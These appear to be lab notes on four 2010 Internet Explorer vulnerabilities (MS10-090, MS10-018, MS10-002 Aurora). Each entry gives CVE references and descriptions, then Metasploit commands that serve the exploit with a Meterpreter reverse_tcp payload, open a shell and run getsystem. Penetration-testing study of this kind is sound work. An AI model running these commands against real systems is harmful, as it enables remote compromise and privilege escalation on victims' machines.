MS10-090 : Microsoft Internet Explorer CSS Tags Memory Corruption

PoC provided by :

unknown
Matteo Memelli
jduck

Reference(s) :

CVE-2010-3962
MSA-2458511
MS10-090

Affected version(s) :

Internet Explorer 6, 7 & 8

Tested on Windows XP SP3 with :

Internet Explorer 6 (mshtml.dll 6.0.2900.5512)

Description :

This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead to arbitrary code execution. It seems that Microsoft's code inadvertently increments a vtable pointer so that it points to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the address found at "[vtable+0x30+1]". The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable: specifically, those where the resulting program counter value lands within another module, in kernel space, or at an address that cannot be reached with the various memory spraying techniques. Also, since the address is not controllable, it is unlikely that ROP can be used to bypass non-executable memory protections.

Commands :

use exploit/windows/browser/ms10_xxx_ie_css_clip
set SRVHOST 192.168.178.21
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
getsystem
shell

MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free

Timeline :

Microsoft advisory MSA981374 released on 2010-03-09
Exploit-DB PoC provided by Trancer on 2010-03-10
Metasploit PoC provided by jduck on 2010-03-10
Microsoft patch "KB980182" released on 2010-03-30

PoC provided by :

unknown
Trancer
Nanika
jduck

Reference(s) :

CVE-2010-0806
MS10-018

Affected version(s) :

Internet Explorer 6
Internet Explorer 7

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in the wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround of blocking access to the iepeers.dll file. According to Nico Waisman, "The bug itself is when trying to persist an object using the setAttribute, which ends up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which derefs the reference and cleans the object." NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.

Commands :

use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption

Timeline :

Vulnerability privately disclosed to Microsoft by ZDI on 2009-10-20
Microsoft patch "KB980182" released on 2010-03-30
Metasploit PoC provided by jduck on 2010-04-05

PoC provided by :

Anonymous
jduck

Reference(s) :

CVE-2010-0805
MS10-018

Affected version(s) :

Internet Explorer 5
Internet Explorer 6

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that versions 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the "DataURL" parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.

Commands :

use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-002 : Internet Explorer Aurora Memory Corruption

Timeline :

Vulnerability reported to Microsoft on 2010-01-13
Metasploit PoC provided by hdm on 2010-01-15
Exploit-DB PoC provided by Ahmed Obied on 2010-01-17
Microsoft patch "KB978207" released on 2010-01-21

PoC provided by :

unknown
hdm

Reference(s) :

CVE-2010-0249
MS10-002

Affected version(s) :

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB978207

Description :

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that led to the compromise of a number of high-profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample; as such, only Internet Explorer 6 can be reliably exploited.

Commands :

use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig